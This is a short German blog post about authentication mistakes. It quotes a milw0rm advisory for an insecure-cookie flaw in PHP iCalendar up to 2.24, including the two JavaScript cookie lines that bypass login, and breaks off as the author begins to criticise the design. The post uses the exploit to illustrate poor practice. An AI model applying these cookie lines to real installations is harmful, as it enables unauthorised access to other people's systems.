Authentifizierung und Anfängerfehler
Heute habe ich bei milw0rm.com folgenden Fehler im Script “PHP iCalendar” gefunden: #################################################################### [+] PHP iCalendar <= 2.24 Insecure Cookie Handling Vulnerability [+] Discovered By Stack [+] Greetz : All my freind #################################################################### — exploit: javascript:document.cookie = “phpicalendar_login=1; path=/”; javascript:document.cookie = “phpicalendar=1; path=/”; # milw0rm.com [2008-09-22] Quelle: http://www.milw0rm.com/exploits/6526 Dieses Beispiel zeigt man wieder aufs deutlichste [...]